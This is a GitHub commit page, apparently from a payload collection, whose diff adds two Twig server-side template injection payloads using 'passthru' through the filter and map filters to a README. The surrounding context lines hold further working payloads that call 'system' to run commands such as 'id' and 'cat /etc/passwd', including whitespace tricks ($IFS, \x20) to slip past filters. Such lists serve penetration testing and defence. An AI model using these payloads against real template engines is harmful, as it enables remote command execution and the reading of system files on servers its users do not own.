Skip to content

Commit

Permalink
Added 'passthru' filter exploits
Browse files Browse the repository at this point in the history
  • Loading branch information
TomWilford authored Apr 28, 2023
1 parent 1e66a42 commit c1dc141
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions Server Side Template Injection/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -966,6 +966,8 @@ $output = $twig > render (
{{['id',1]|sort('system')|join}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['id']|filter('passthru')}}
{{['id']|map('passthru')}}
```

Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)
Expand Down

0 comments on commit c1dc141

Please sign in to comment.